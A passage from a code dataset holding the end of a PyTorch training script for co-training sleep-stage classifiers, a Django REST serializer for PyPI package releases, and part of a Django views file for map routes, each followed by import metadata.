mask out self-similarity\n # loss = criterion(logits, targets_clone)\n # else:\n # loss = criterion(logits, targets)\n\n # loss = criterion(logits, targets)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n losses.append(loss.item())\n\n progress_bar.set_postfix(\n {'Loss': np.mean(losses), 'Acc': np.mean(accuracies)})\n if args.wandb:\n wandb.log({f'pretrain_loss_it{it}': np.mean(loss), f'pretrain_acc_it{it}': np.mean(accuracies)})\n\n\ndef finetune(classifier, dataset, device, it, args):\n params = []\n if args.finetune_mode == 'freeze':\n print('[INFO] Finetune classifier only for the last layer...')\n for name, param in 
classifier.named_parameters():\n if 'encoder' in name or 'agg' in name or 'sampler' in name:\n param.requires_grad = False\n else:\n params.append({'params': param})\n elif args.finetune_mode == 'smaller':\n print('[INFO] Finetune the whole classifier where the backbone have a smaller lr...')\n for name, param in classifier.named_parameters():\n if 'encoder' in name or 'agg' in name or 'sampler' in name:\n params.append({'params': param, 'lr': args.lr / 10})\n else:\n params.append({'params': param})\n else:\n print('[INFO] Finetune the whole classifier...')\n for name, param in classifier.named_parameters():\n params.append({'params': param})\n\n if args.optimizer == 'sgd':\n optimizer = optim.SGD(params, lr=args.lr, weight_decay=args.wd, momentum=args.momentum)\n elif args.optimizer == 'adam':\n optimizer = optim.Adam(params, lr=args.lr, weight_decay=args.wd, betas=(0.9, 0.98), eps=1e-09,\n amsgrad=True)\n elif args.optimizer == 'adamw':\n optimizer = optim.AdamW(params, weight_decay=args.wd, lr=args.lr)\n else:\n raise ValueError('Invalid optimizer!')\n\n criterion = nn.CrossEntropyLoss().cuda(device)\n\n sampled_indices = np.arange(len(dataset))\n np.random.shuffle(sampled_indices)\n sampled_indices = sampled_indices[:int(len(sampled_indices) * args.finetune_ratio)]\n data_loader = DataLoader(dataset, batch_size=args.batch_size, num_workers=args.num_workers,\n shuffle=False, pin_memory=True, drop_last=True,\n sampler=SubsetRandomSampler(sampled_indices))\n\n classifier.train()\n for epoch in range(args.finetune_epochs):\n losses = []\n accuracies = []\n with tqdm(data_loader, desc=f'EPOCH [{epoch + 1}/{args.finetune_epochs}]') as progress_bar:\n for x1, y, _, x2, __, ___ in progress_bar:\n x1, y, x2 = x1.cuda(device, non_blocking=True), y.cuda(device, non_blocking=True), x2.cuda(device,\n non_blocking=True)\n\n out = classifier(x1, x2)\n # out = out.view(-1, out.shape[-1])\n\n loss = criterion(out, y.view(-1))\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n losses.append(loss.item())\n accuracies.append(logits_accuracy(out, y.view(-1), topk=(1,))[0])\n\n progress_bar.set_postfix({'Loss': np.mean(losses), 'Acc': np.mean(accuracies)})\n if args.wandb:\n if it is None:\n wandb.log(\n {'finetune_acc_it': np.mean(accuracies), 'finetune_loss': np.mean(losses)})\n else:\n wandb.log({f'finetune_acc_it{it}': np.mean(accuracies), f'finetune_loss_it{it}': np.mean(losses)})\n\n\ndef evaluate(classifier, dataset, device, args):\n data_loader = DataLoader(dataset, batch_size=args.batch_size, num_workers=args.num_workers,\n shuffle=True, pin_memory=True, drop_last=True)\n\n targets = []\n scores = []\n\n classifier.eval()\n with torch.no_grad():\n for x1, y, x2, _ in data_loader:\n x1, x2 = x1.cuda(device, non_blocking=True), x2.cuda(device, non_blocking=True)\n\n out = classifier(x1, x2)\n scores.append(out.cpu().numpy())\n targets.append(y.view(-1).numpy())\n\n scores = np.concatenate(scores, axis=0)\n targets = np.concatenate(targets, axis=0)\n\n return scores, targets\n\n\ndef test(state_dict, dataset_v1, dataset_v2, test_dataset_v1, test_dataset_v2, reverse, device, it, args):\n # Finetuning\n if args.finetune_mode == 'freeze':\n use_dropout = False\n use_l2_norm = True\n use_final_bn = True\n else:\n use_dropout = True\n use_l2_norm = False\n use_final_bn = False\n\n if not reverse:\n classifier = DPCFusionClassifier(first_network=args.network, second_network=args.second_network,\n first_channels=args.channels_v1, second_channels=args.channels_v2,\n hidden_channels=16,\n 
feature_dim=args.feature_dim,\n num_class=5,\n use_dropout=use_dropout,\n use_l2_norm=use_l2_norm,\n use_batch_norm=use_final_bn, device=device)\n else:\n classifier = DPCFusionClassifier(first_network=args.second_network, second_network=args.network,\n first_channels=args.channels_v2, second_channels=args.channels_v1,\n hidden_channels=16,\n feature_dim=args.feature_dim,\n num_class=5,\n use_dropout=use_dropout,\n use_l2_norm=use_l2_norm,\n use_batch_norm=use_final_bn, device=device)\n classifier.cuda(device)\n\n new_state_dict = {}\n for key, param in state_dict.items():\n if 'encoder_q.' in key:\n key = key.replace('encoder_q.', 'encoder.')\n new_state_dict[key] = param\n elif 'sampler.' in key:\n new_state_dict[key] = param\n state_dict = new_state_dict\n\n classifier.load_state_dict(state_dict, strict=False)\n\n dataset = TwoDataset(dataset_v1, dataset_v2)\n finetune(classifier, dataset, device, it, args)\n\n # transform = TF.Compose(\n # [TF.Resize((64, 64)), TF.ToTensor()]\n # )\n # if (args.network == 'r1d' and not reverse) or (args.network == 'r2d' and reverse):\n # test_dataset_v1 = SleepDataset(args.data_path_v1, args.data_name, args.num_epoch, test_patients,\n # preprocessing=args.preprocessing)\n # test_dataset_v2 = SleepDatasetImg(args.data_path_v2, args.data_name, args.num_epoch, transform=transform,\n # patients=test_patients)\n # else:\n # test_dataset_v1 = SleepDatasetImg(args.data_path_v1, args.data_name, args.num_epoch, transform=transform,\n # patients=test_patients)\n # test_dataset_v2 = SleepDataset(args.data_path_v2, args.data_name, args.num_epoch, test_patients,\n # preprocessing=args.preprocessing)\n\n test_dataset = TwoDataset(test_dataset_v1, test_dataset_v2)\n\n scores, targets = evaluate(classifier, test_dataset, device, args)\n performance = get_performance(scores, targets)\n print(performance)\n return performance\n\n\ndef main_worker(run_id, device, train_patients, test_patients, args):\n assert os.path.isfile(args.load_path_v1), f'Invalid file path {args.load_path_v1}!'\n assert os.path.isfile(args.load_path_v2), f'Invalid file path {args.load_path_v2}!'\n\n state_dict_v1 = torch.load(args.load_path_v1)\n state_dict_v2 = torch.load(args.load_path_v2)\n\n print('[INFO] Loading training dataset...')\n if args.network == 'r1d':\n train_dataset_v1 = SleepDataset(args.data_path_v1, args.data_name, args.num_epoch, train_patients,\n preprocessing=args.preprocessing, return_idx=True)\n else:\n transform = TF.Compose(\n [TF.Resize((64, 64)), TF.ToTensor()]\n )\n train_dataset_v1 = SleepDatasetImg(args.data_path_v1, args.data_name, args.num_epoch, transform=transform,\n patients=train_patients, return_idx=True)\n print(train_dataset_v1)\n\n if args.second_network == 'r1d':\n train_dataset_v2 = SleepDataset(args.data_path_v2, args.data_name, args.num_epoch, train_patients,\n preprocessing=args.preprocessing, return_idx=True)\n else:\n transform = TF.Compose(\n [TF.Resize((64, 64)), TF.ToTensor()]\n )\n train_dataset_v2 = SleepDatasetImg(args.data_path_v2, args.data_name, args.num_epoch, transform=transform,\n patients=train_patients, return_idx=True)\n print(train_dataset_v2)\n\n print('[INFO] Loading evaluation dataset...')\n\n transform = TF.Compose(\n [TF.Resize((64, 64)), TF.ToTensor()]\n )\n if args.network == 'r1d':\n test_dataset_v1 = SleepDataset(args.data_path_v1, args.data_name, args.num_epoch, test_patients,\n preprocessing=args.preprocessing)\n test_dataset_v2 = SleepDatasetImg(args.data_path_v2, args.data_name, args.num_epoch, transform=transform,\n 
patients=test_patients)\n else:\n test_dataset_v1 = SleepDatasetImg(args.data_path_v1, args.data_name, args.num_epoch, transform=transform,\n patients=test_patients)\n test_dataset_v2 = SleepDataset(args.data_path_v2, args.data_name, args.num_epoch, test_patients,\n preprocessing=args.preprocessing)\n\n # The last iteration should train the first view\n assert args.iteration % 2 == 1\n\n # Refine pretraining\n for it in range(args.iteration):\n if it % 2 == 1:\n reverse = True\n else:\n reverse = False\n\n if reverse:\n print(f'[INFO] Iteration {it + 1}, train the second view...')\n else:\n print(f'[INFO] Iteration {it + 1}, train the first view...')\n\n if reverse:\n model = CoSleep(first_network=args.second_network, first_channels=args.channels_v2,\n second_network=args.network, second_channels=args.channels_v1,\n hidden_channels=16, feature_dim=args.feature_dim, pred_steps=args.pred_steps,\n temperature=args.temperature, m=args.mem_m, K=args.mem_k,\n num_prop=args.num_prop, lam=args.lam, lower_bound=args.lower_bound,\n upper_bound=args.upper_bound, use_temperature=False, device=device)\n else:\n model = CoSleep(first_network=args.network, first_channels=args.channels_v1,\n second_network=args.second_network, second_channels=args.channels_v2,\n hidden_channels=16, feature_dim=args.feature_dim, pred_steps=args.pred_steps,\n temperature=args.temperature, m=args.mem_m, K=args.mem_k,\n num_prop=args.num_prop, lam=args.lam, lower_bound=args.lower_bound,\n upper_bound=args.upper_bound, use_temperature=False, device=device)\n\n model.cuda(device)\n\n # Second view as sampler\n new_dict = {}\n new_state_dict_v2 = copy.deepcopy(state_dict_v2)\n for k, v in new_state_dict_v2.items():\n if 'encoder_q.' in k:\n k = k.replace('encoder_q.', 'sampler.')\n new_dict[k] = v\n new_state_dict_v2 = new_dict\n new_dict = {}\n # Remove queue\n for k, v in new_state_dict_v2.items():\n if 'queue' not in k:\n new_dict[k] = v\n new_state_dict_v2 = new_dict\n\n # First view as encoder k\n new_dict = {} # remove queue, queue_ptr\n new_state_dict_v1 = copy.deepcopy(state_dict_v1)\n for k, v in new_state_dict_v1.items():\n if 'queue' not in k:\n new_dict[k] = v\n new_state_dict_v1 = new_dict\n\n state_dict = {**new_state_dict_v1, **new_state_dict_v2}\n model.load_state_dict(state_dict, strict=False)\n\n print(f'Test for iteration [{it}]...')\n if reverse:\n test(model.state_dict(), train_dataset_v2, train_dataset_v1, test_dataset_v2, test_dataset_v1,\n reverse, device, it, args)\n else:\n test(model.state_dict(), train_dataset_v1, train_dataset_v2, test_dataset_v1, test_dataset_v2,\n reverse, device, it, args)\n\n if reverse:\n pretrain(model, train_dataset_v2, train_dataset_v1, device, run_id, it, args)\n else:\n pretrain(model, train_dataset_v1, train_dataset_v2, device, run_id, it, args)\n\n # Update the state dict\n state_dict_v1 = model.state_dict()\n state_dict_v1, state_dict_v2 = state_dict_v2, state_dict_v1\n\n # Saving\n if reverse:\n torch.save(model.state_dict(),\n os.path.join(args.save_path, f'cosleep_second_run_{run_id}_iter_{it}.pth.tar'))\n # test(model.state_dict(), train_dataset_v2, train_dataset_v1, test_patients, reverse, device, it, args)\n else:\n torch.save(model.state_dict(),\n os.path.join(args.save_path, f'cosleep_first_run_{run_id}_iter_{it}.pth.tar'))\n # test(model.state_dict(), train_dataset_v1, train_dataset_v2, test_patients, reverse, device, it, args)\n\n # Finetuning\n if args.finetune_mode == 'freeze':\n use_dropout = False\n use_l2_norm = True\n use_final_bn = True\n else:\n 
use_dropout = True\n use_l2_norm = False\n use_final_bn = False\n classifier = DPCFusionClassifier(first_network=args.network, second_network=args.second_network,\n first_channels=args.channels_v1, second_channels=args.channels_v2,\n hidden_channels=16, feature_dim=args.feature_dim, num_class=5,\n use_dropout=use_dropout, use_l2_norm=use_l2_norm, use_batch_norm=use_final_bn,\n device=device)\n classifier.cuda(device)\n\n state_dict = model.state_dict()\n new_state_dict = {}\n for key, param in state_dict.items():\n if 'encoder_q.' in key:\n key = key.replace('encoder_q.', 'encoder.')\n new_state_dict[key] = param\n elif 'sampler.' in key:\n new_state_dict[key] = param\n state_dict = new_state_dict\n classifier.load_state_dict(state_dict, strict=False)\n\n train_dataset = TwoDataset(train_dataset_v1, train_dataset_v2)\n finetune(classifier, train_dataset, device, None, args)\n torch.save(classifier.state_dict(), os.path.join(args.save_path, f'mc3_run_{run_id}_finetuned.pth.tar'))\n\n # Evaluation\n del train_dataset_v1, train_dataset_v2\n\n test_dataset = TwoDataset(test_dataset_v1, test_dataset_v2)\n\n scores, targets = evaluate(classifier, test_dataset, device, args)\n performance, _ = get_performance(scores, targets)\n with open(os.path.join(args.save_path, f'statistics_{run_id}.pkl'), 'wb') as f:\n pickle.dump({'performance': performance, 'args': vars(args), 'cmd': sys.argv}, f)\n performance.to_csv(os.path.join(args.save_path, 'performance.csv'), index=False)\n print(performance)\n\n\nif __name__ == '__main__':\n args = parse_args()\n\n if args.seed is not None:\n setup_seed(args.seed)\n\n if args.wandb:\n with open('../data/wandb.txt', 'r') as f:\n os.environ['WANDB_API_KEY'] = f.readlines()[0]\n name = 'mc3'\n name += f'_fold{args.fold}'\n name += datetime.now().strftime('_%m-%d_%H-%M')\n wandb.init(project='MC3', group='MC3', name=name, config=args)\n\n devices = args.devices\n if devices is None:\n devices = list(range(torch.cuda.device_count()))\n\n if not os.path.exists(args.save_path):\n warnings.warn(f'The path {args.save_path} dost not existed, created...')\n os.makedirs(args.save_path)\n elif not args.resume:\n warnings.warn(f'The path {args.save_path} already exists, deleted...')\n shutil.rmtree(args.save_path)\n os.makedirs(args.save_path)\n\n print(f'[INFO] Using devices {devices}...')\n\n files = os.listdir(args.data_path_v1)\n patients = []\n for a_file in files:\n if a_file.endswith('.npz'):\n patients.append(a_file)\n # patients = np.asarray(patients)\n\n patients = sorted(patients)\n patients = np.asarray(patients)\n\n assert args.kfold <= len(patients)\n assert args.fold < args.kfold\n kf = KFold(n_splits=args.kfold)\n for i, (train_index, test_index) in enumerate(kf.split(patients)):\n if i == args.fold:\n print(f'[INFO] Running cross validation for {i + 1}/{args.kfold} fold...')\n train_patients, test_patients = patients[train_index].tolist(), patients[test_index].tolist()\n main_worker(i, devices[0], train_patients, test_patients, args)\n break\n", "sub_path": "main_cosleep.py", "file_name": "main_cosleep.py", "file_ext": "py", "file_size_in_byte": 25662, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "warnings.warn", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed_all", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 40, "usage_type": "attribute"}, 
{"api_name": "numpy.random.seed", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 41, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.backends", "line_number": 43, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.optim.SGD", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 132, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 134, "usage_type": "name"}, {"api_name": "torch.optim.AdamW", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 136, "usage_type": "name"}, {"api_name": "cosleep.data.TwoDataset", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 143, "usage_type": "call"}, {"api_name": "cosleep.utils.MultiNCELoss", "line_number": 146, "usage_type": "call"}, {"api_name": "tqdm.std.tqdm", "line_number": 159, "usage_type": "call"}, {"api_name": "cosleep.utils.mask_accuracy", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 194, "usage_type": "call"}, {"api_name": "wandb.log", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.optim.SGD", "line_number": 221, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 221, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 223, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 223, "usage_type": "name"}, {"api_name": "torch.optim.AdamW", "line_number": 226, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 226, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 230, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 233, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 235, "usage_type": "call"}, {"api_name": "torch.utils.data.SubsetRandomSampler", "line_number": 237, "usage_type": "call"}, {"api_name": "tqdm.std.tqdm", "line_number": 243, "usage_type": "call"}, {"api_name": "cosleep.utils.logits_accuracy", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 260, "usage_type": "call"}, {"api_name": "wandb.log", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 264, "usage_type": "call"}, {"api_name": "wandb.log", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 266, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 286, "usage_type": "call"}, {"api_name": "cosleep.model.DPCFusionClassifier", "line_number": 303, "usage_type": "call"}, {"api_name": "cosleep.model.DPCFusionClassifier", "line_number": 312, "usage_type": "call"}, {"api_name": "cosleep.data.TwoDataset", "line_number": 333, "usage_type": "call"}, 
{"api_name": "cosleep.data.TwoDataset", "line_number": 350, "usage_type": "call"}, {"api_name": "cosleep.utils.get_performance", "line_number": 353, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path", "line_number": 359, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 360, "usage_type": "call"}, {"api_name": "os.path", "line_number": 360, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 362, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 363, "usage_type": "call"}, {"api_name": "cosleep.data.SleepDataset", "line_number": 367, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 370, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 370, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 371, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 371, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 371, "usage_type": "call"}, {"api_name": "cosleep.data.SleepDatasetImg", "line_number": 373, "usage_type": "call"}, {"api_name": "cosleep.data.SleepDataset", "line_number": 378, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 381, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 381, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 382, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 382, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 382, "usage_type": "call"}, {"api_name": "cosleep.data.SleepDatasetImg", "line_number": 384, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 390, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 390, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 391, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 391, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 391, "usage_type": "call"}, {"api_name": "cosleep.data.SleepDataset", "line_number": 394, "usage_type": "call"}, {"api_name": "cosleep.data.SleepDatasetImg", "line_number": 396, "usage_type": "call"}, {"api_name": "cosleep.data.SleepDatasetImg", "line_number": 399, "usage_type": "call"}, {"api_name": "cosleep.data.SleepDataset", "line_number": 401, "usage_type": "call"}, {"api_name": "cosleep.model.CoSleep", "line_number": 420, "usage_type": "call"}, {"api_name": "cosleep.model.CoSleep", "line_number": 427, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 438, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 453, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 481, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 482, "usage_type": "call"}, {"api_name": "os.path", "line_number": 482, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 485, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 486, "usage_type": "call"}, {"api_name": "os.path", "line_number": 486, "usage_type": "attribute"}, {"api_name": "cosleep.model.DPCFusionClassifier", "line_number": 498, "usage_type": "call"}, {"api_name": "cosleep.data.TwoDataset", "line_number": 516, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 
518, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 518, "usage_type": "call"}, {"api_name": "os.path", "line_number": 518, "usage_type": "attribute"}, {"api_name": "cosleep.data.TwoDataset", "line_number": 523, "usage_type": "call"}, {"api_name": "cosleep.utils.get_performance", "line_number": 526, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 527, "usage_type": "call"}, {"api_name": "os.path", "line_number": 527, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 528, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 528, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 529, "usage_type": "call"}, {"api_name": "os.path", "line_number": 529, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 541, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 544, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 544, "usage_type": "name"}, {"api_name": "wandb.init", "line_number": 545, "usage_type": "call"}, {"api_name": "torch.cuda.device_count", "line_number": 549, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 549, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 551, "usage_type": "call"}, {"api_name": "os.path", "line_number": 551, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 552, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 553, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 555, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 556, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 557, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 561, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 569, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 573, "usage_type": "call"}]} +{"seq_id": "15192807", "text": "from rest_framework import serializers\n\nfrom .models import PackageRelease, Project\nfrom .pypi import version_exists, latest_version\n\n\nclass PackageSerializer(serializers.ModelSerializer):\n class Meta:\n model = PackageRelease\n fields = [\"name\", \"version\"]\n extra_kwargs = {\"version\": {\"required\": False}}\n\n def validate(self, data):\n \n if \"version\" not in data:\n validated_data = latest_version(data[\"name\"])\n\n if validated_data == None:\n raise serializers.ValidationError()\n\n return validated_data\n \n if not version_exists(data[\"name\"], data[\"version\"]):\n raise serializers.ValidationError()\n\n validated_data = {\"name\": data[\"name\"], \"version\": data[\"version\"]}\n return validated_data\n\n\nclass ProjectSerializer(serializers.ModelSerializer):\n class Meta:\n model = Project\n fields = [\"name\", \"packages\"]\n\n packages = PackageSerializer(many=True)\n\n def create(self, validated_data):\n \n project = Project(name=validated_data[\"name\"])\n project.save()\n\n for package in validated_data[\"packages\"]:\n exist = PackageRelease.objects.filter(name=package[\"name\"], project_id=project.id)\n \n if exist:\n continue\n\n package_release = PackageRelease(\n project_id=project.id, \n name=package[\"name\"], \n version=package[\"version\"]\n )\n package_release.save()\n \n return project\n", "sub_path": "api/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 1588, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": 
"code-starcoder2", "pt": "52", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 7, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 7, "usage_type": "name"}, {"api_name": "models.PackageRelease", "line_number": 9, "usage_type": "name"}, {"api_name": "pypi.latest_version", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework.serializers.ValidationError", "line_number": 19, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 19, "usage_type": "name"}, {"api_name": "pypi.version_exists", "line_number": 23, "usage_type": "call"}, {"api_name": "rest_framework.serializers.ValidationError", "line_number": 24, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 24, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 30, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 30, "usage_type": "name"}, {"api_name": "models.Project", "line_number": 32, "usage_type": "name"}, {"api_name": "models.Project", "line_number": 39, "usage_type": "call"}, {"api_name": "models.PackageRelease.objects.filter", "line_number": 43, "usage_type": "call"}, {"api_name": "models.PackageRelease.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "models.PackageRelease", "line_number": 43, "usage_type": "name"}, {"api_name": "models.PackageRelease", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "375390494", "text": "import json\nimport os\n\nfrom django.conf import settings\nfrom django.shortcuts import render_to_response, redirect, get_object_or_404\nfrom django.template.context_processors import csrf\nfrom django.http import JsonResponse\n\nfrom apps.routes.models import Route\nfrom apps.routes.forms.tracks_file import TracksFileForm\nfrom django.contrib.gis.geos import Polygon\nfrom apps.common.decorators import login_required\nfrom django.middleware.csrf import get_token\n\n\n@login_required\ndef tmp_load_data(request):\n Route.objects.all().delete()\n examples_dir = os.path.join(settings.BASE_DIR, '../data/example routes/')\n for filename in os.listdir(examples_dir):\n filepath = os.path.join(examples_dir, filename)\n Route.objects.route_from_file(filepath)\n return redirect('list-routes')\n\n\n@login_required\ndef create(request):\n route = Route.objects.create()\n return redirect('edit-route', route.id)\n\n\ndef api_route(request, pub_id):\n\n route = get_object_or_404(Route, pub_id=pub_id)\n se, nw = route.lines.boundary.coords\n route_details = {\n 'center': {\"coordinates\": [route.center[0], route.center[1]]},\n 'name': route.name,\n 'description': route.description,\n 'image_url': route.image_url,\n 'pub_id': pub_id,\n 'zoom_level': 1,\n 'lines': route.lines_zoom_1,\n 'bbox': {\n 'n': nw[0],\n 's': se[0],\n 'w': nw[1],\n 'e': se[1]\n },\n }\n return JsonResponse(route_details, safe=False)\n\n\ndef api_all(request):\n # bbox_coords = (xmin, ymin, xmax, ymax)\n # \"lat_lo,lng_lo,lat_hi,lng_hi\"\n bounds = request.GET['bounds'].split(\",\")\n bbox_coords = [float(val) for val in bounds]\n bbox = Polygon.from_bbox(bbox_coords)\n\n try:\n map_zoom = int(request.GET.get('zoom', \"20\"))\n except:\n map_zoom = 20\n zoom_level = {\n 11: 4,\n 12: 4,\n 13: 3,\n 14: 2,\n 15: 1,\n 16: 1,\n 17: 1,\n 18: 1,\n 19: 1,\n 20: 1,\n }.get(map_zoom, 5)\n zoom_field_name = \"lines_zoom_{}\".format(zoom_level)\n\n qs = Route.objects.filter(lines__bboverlaps=bbox)\n\n routes = []\n if 
qs.count() < 10:\n zoom_field_name = \"lines_zoom_1\"\n qs = qs.values(\"center\", \"name\", \"description\", \"image_url\", \"pub_id\", zoom_field_name)\n count = 0\n for route in qs:\n count += 1\n center = route[\"center\"]\n if center:\n center = {\"coordinates\": [center[0], center[1]]}\n\n routes.append({\n 'center': center,\n 'name': route[\"name\"],\n 'description': route[\"description\"],\n 'image_url': route[\"image_url\"],\n 'pub_id': route[\"pub_id\"],\n 'zoom_level': zoom_level,\n 'lines': json.loads(route[zoom_field_name])\n })\n return JsonResponse(routes, safe=False)\n\n\n@login_required\ndef upload(request):\n if request.method == \"POST\":\n form = TracksFileForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('home')\n\n form = TracksFileForm()\n context = {'form': form}\n context.update(csrf(request))\n return render_to_response(\"upload_routes.html\", context)\n\n\n@login_required\ndef edit(request, route_id):\n route = Route.objects.get(id=route_id)\n route.center = 'POINT(-123.329773 48.407326)'\n context = {\n 'route': route,\n 'GOOGLE_MAPS_API_KEY': settings.GOOGLE_MAPS_API_KEY}\n return render_to_response(\"route/edit.html\", context)\n\n\n@login_required\ndef browse(request):\n context = {\n \"csrf_token\": get_token(request),\n \"GOOGLE_MAPS_API_KEY\": settings.GOOGLE_MAPS_API_KEY,\n }\n return render_to_response(\"home.html\", context)\n\n\n@login_required\ndef view(request, route_id):\n route = Route.objects.get(id=route_id)\n if not route.center:\n route.center = 'POINT(-123.329773 48.407326)'\n else:\n route.center = str(route.center).split(\";\")[1].replace(\" (\", \"(\")\n context = {\n 'route': route,\n 'GOOGLE_MAPS_API_KEY': settings.GOOGLE_MAPS_API_KEY}\n return render_to_response(\"route/view.html\", context)\n\n", "sub_path": "apps/routes/views/route.py", "file_name": "route.py", "file_ext": "py", "file_size_in_byte": 4171, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "apps.routes.models.Route.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "apps.routes.models.Route.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "apps.routes.models.Route", "line_number": 18, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.conf.settings.BASE_DIR", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 19, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "apps.routes.models.Route.objects.route_from_file", "line_number": 22, "usage_type": "call"}, {"api_name": "apps.routes.models.Route.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "apps.routes.models.Route", "line_number": 22, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 23, "usage_type": "call"}, {"api_name": "apps.common.decorators.login_required", "line_number": 16, "usage_type": 